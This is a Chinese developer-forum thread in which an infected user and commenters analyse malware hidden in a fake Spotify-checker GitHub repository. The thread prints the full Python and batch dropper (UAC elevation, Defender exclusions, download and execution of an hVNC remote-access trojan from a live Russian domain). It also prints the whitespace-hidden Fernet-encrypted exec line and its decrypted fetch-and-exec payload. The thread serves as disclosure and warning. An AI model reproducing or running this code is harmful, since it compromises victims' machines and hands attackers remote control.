代码传网盘了,有没有大佬能看看怎么办😭 https://www.alipan.com/s/ysPCcqoe5TT
第一个文件名是 hvnc.py
import os
import subprocess
script = """
import os
def create_and_run_bat_script():
bat_script_content = '''
@echo off
set "filePath=%appdata%\Microsoft\emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM --> Check for permissions
IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
)
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params= %*
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------
mkdir "C:\Windows\WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
set "temp_file=%TEMP%\hahabonk.exe"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')"
start "" "%temp_file%"
del /q "%appdata%\Microsoft\runpython.py"
'''
temp_folder = os.environ.get('TEMP', '')
if temp_folder:
bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
with open(bat_script_path, 'w') as bat_file:
bat_file.write(bat_script_content)
os.system(bat_script_path)
else:
print("Failed to get the TEMP folder path.")
if os.name == 'nt':
folder_path = r"C:\Windows\WinEmptyfold"
if os.path.exists(folder_path):
exit()
else:
os.system('timeout 600')
os.system('taskkill /f /im explorer.exe')
create_and_run_bat_script()
while True:
os.system('timeout 5')
if os.path.exists(folder_path):
os.system('start explorer.exe')
break
else:
create_and_run_bat_script()
"""
appdata = os.environ.get('APPDATA', '')
if appdata:
# create microsoft folder if it doesn't exist
microsoft_folder = os.path.join(appdata, 'Microsoft')
if not os.path.exists(microsoft_folder):
os.mkdir(microsoft_folder)
script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
with open(script_path, 'w') as script_file:
script_file.write(script)
subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)
1
Jimmyisme OP |
2
Jimmyisme OP |
3
WoneFrank 260 天前 1
一看就病毒啊,有突破 UAC ,还去这拉了个 exe: https://bananasquad.ru/hvnc.exe 。
可以看 virustotal: https://www.virustotal.com/gui/domain/bananasquad.ru/relations |
4
AoEiuV020JP 260 天前 2
有点搞笑了,投 python 病毒也不管电脑上有没有 python 环境,直接默认编辑器打开了,
|
5
Jimmyisme OP 另一一个代码文件是(fernet)[https://github.com/oz123/python-fernet]加密的,
https://imgur.com/AAYVOQn 解密后是这样的 https://imgur.com/Z0h00ad Kaggle notebook: https://www.kaggle.com/code/jimmyisme1/virus-check/notebook?scriptVersionId=164624730 |
7
Jimmyisme OP @AoEiuV020JP 幸好我默认设置.py 是用 vscode 打开。我发现我默认的 python 环境确实装了他这个脚本要运行的 fernet 库。😱
|
9
Jimmyisme OP 我知道是哪里来的了,真 nm 脑残啊
https://github.com/maqrtineLzjulyie/spotify-check-premium/blob/main/main.py 第一行的最后面。还有 nm 一段代码。艹了 之前刷到在舍友的 for 循环后面偷偷加分号,乐子人终成乐子。妈的 |
12
M2K4 260 天前 via Android
吓得我赶紧把自动折行打开
|
13
chackchackGO 260 天前
@Jimmyisme 为什么这个仓库有 4.5k 的 fork? 我没看明白
|
14
morgan1freeman 260 天前
@Jimmyisme #9 开源 也不是完全安全,还是得审核代码,问题太多了
|
17
nekomiao 260 天前 1
@chackchackGO fork 和 star 差这么多,明显是刷的
|
18
inhzus 260 天前
速速打开 toggle word wrap
|
19
Link99 260 天前
牛逼 这干嘛用的啊 Fork 4.5k Star 6 ?
|
20
Jimmyisme OP @chackchackGO #13 到处害人
|
22
shinession 260 天前
学到了一招, 还能这么玩的
|
23
flyqie 260 天前 via Android
感谢分享,涨知识了,已向 github 举报
|
25
wangkun025 260 天前
已经举报给 GitHub 了。
|
26
Les1ie 260 天前
恶意代码部分:
``` import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'yKpskffUwlXAGQtWJiXILDemLKDod4v8DpfKK3ClcHo=').decrypt(b'gAAAAABlv3l_ShNj4Sta_rsNaa9OI2cs0EyIBDdLPw6x4VVSxY9AYPGhGcOClTKrp_TBol_GE50_2GWBH3IfwUsOTJpM5PvjUgD939S4E75PGnNWs_qq9kk1mbhzcEuOumsWSm28OPbC6vs4CjgTliTihSbRedGIUvizU9JdEpFIQfkFU6sbmpBFR9kzI8ttiIoFqxLvEriZ6tvIumAuq_s-A65rXKflng==')) import requests import json ``` 利用超长的空格欺骗没有开启自动换行的编辑器,的确是未设想的添加后门的方式。这个方法究极简单却有用,稍有不慎我也可能中招了。 |
27
CivAx 260 天前
这个藏的有意思,已经向 github report-abuse 了。
|
28
noahlias 260 天前
看了一下 点开它的 fork 都是机器人
都是 2 周前注册的 而且他们的 repo 都有这段代码哈哈 应该都是钓鱼的 |
29
ohmyhaha 260 天前
hvnc....按理解这个是远控用的呢
|
31
Jimmyisme OP @ohmyhaha https://github.com/Meltedd/HVNC 开源的恶意软件
|
33
straydragon 260 天前
已举报, 这个思路很简单也很容易中招, 吓得直接开启自动折行了
|
34
Rickkkkkkk 260 天前
(这下知道代码规范里一行不能过长的道理了吧
|
35
fyxtc 260 天前
公共场合投毒啊,这些孙子
|
36
NEPv5NA6R8R3Y11u 260 天前
加密部分代码:
exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>','')) 从这个网站获取代码去除前后标签后执行 |
37
NEPv5NA6R8R3Y11u 260 天前
|
38
NEPv5NA6R8R3Y11u 260 天前
这个人应该是制作脚本的人,看描述是不像是恶性攻击,
|
39
machenme 260 天前
大概意思是先检测系统。如果是 NT 就执行,然后关闭 UAC ,获取管理员权限,然后下载一个那个 hvnc.exe 刚点进去被火绒杀了。建议删了吧
病毒名称:TrojanSpy/MSIL.Stealer.dr 病毒 ID:D7EE101A6EEFC320 |
40
SoyaDokio 260 天前
reported the repository.
|
42
kaleido 260 天前
楼上投诉好像生效了,fork 只有个位数了
|
43
wpyfawkes 260 天前
话说上个月到官网下 sqlmap 里面有个文件也被卡巴斯基报毒了
|
44
makerbi 260 天前
我已经 report 了,Github 刚刚给我回复处理了
|
45
qq316107934 260 天前
report 得到答复了,不仅 repo 没了,号都被扬了,好
|
46
Jimmyisme OP 这个病毒,我估计是我自己手贱,UAC 点了 yes 。这种情况下,杀毒软件是不是已经没有用了?还是说只是火绒太拉。已经准备考虑付费卡巴斯基了
|
47
Levox 260 天前
重装吧 doge
|
49
silencil 260 天前
这是什么项目?
|
52
emma3 260 天前
https://bananasquad.ru/hvnc.exe
这个.exe 是什么东西? |
53
pujx233 260 天前
来晚了项目 404 了,github 上这个项目是干啥的?
|
54
thinkm 260 天前 4
这个帖子我都打不开,关了杀软才能打开
|
55
wangkun025 260 天前
@pujx233 检查是不是 spotify 的 premium 账号
|
56
jeffson 260 天前 via Android
666
|
57
studyingss 259 天前
@thinkm 什么杀软这么强?
|
59
thinkm 259 天前
@studyingss 卡巴斯基
|
60
qiaofanxing 259 天前 via Android
卡巴斯基连网页都打不开,我用的远控没法关掉保护,只好拿手机看的帖子
|
61
Jimmyisme OP @qiaofanxing 刚买了半年的卡巴斯基。感觉弄得电脑好卡,之前软件都是秒开,现在都要等 2 秒以上。
|
62
vainl1 259 天前 1
|